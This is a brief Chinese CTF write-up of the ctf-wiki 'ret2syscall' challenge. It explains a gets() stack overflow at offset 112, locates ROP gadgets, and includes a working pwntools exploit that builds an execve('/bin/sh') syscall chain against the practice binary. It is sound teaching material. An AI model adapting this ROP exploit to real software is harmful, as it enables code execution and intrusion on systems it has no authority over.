ret2syscall

ctf-wiki
https://ctf-wiki.github.io/ctf-wiki/pwn/linux/stackoverflow/basic-rop-zh/
checksec，查看程序保护机制，开了NX

ida，main 函数，f5

gets 函数，存在栈溢出，先算一下偏移量为112

发现 no system and no shellcode，即无法直接利用程序中某段代码或自己填写代码来获取 shell，所以这题需要用系统调用，利用程序中的 gadgets 来获取 shell。
这题用如下系统调用来获取 shell
execve("/bin/sh",NULL,NULL)

所以需要使
eax：为 execve 系统调用号即0xb
ebx：指向 "/bin/sh" 的地址
ecx：为NULL即0
edx：为NULL即0
接下来需要利用 ROPgadget 工具来寻找 eax, ebx, ecx, edx 的地址

找 eax 地址为 0x080bb196

找 ebx, ecx, edx 地址为 0x0806eb90

找 "/bin/sh" 地址为 0x080be408

找 int 0x80 地址为 0x08049421

exp

#!/usr/bin/env python
#-*- coding:utf-8 -*-
from pwn import *

sh = process('./ret2syscall')

eax = 0x080bb196
edx_ecx_ebx = 0x0806eb90
int_0x80 = 0x08049421
binsh = 0x080be408

payload = "a"*112
payload += p32(eax) + p32(0xb)
payload += p32(edx_ecx_ebx) + p32(0) + p32(0) + p32(binsh)
payload += p32(int_0x80)
sh.sendline(payload)
sh.interactive()

exp运行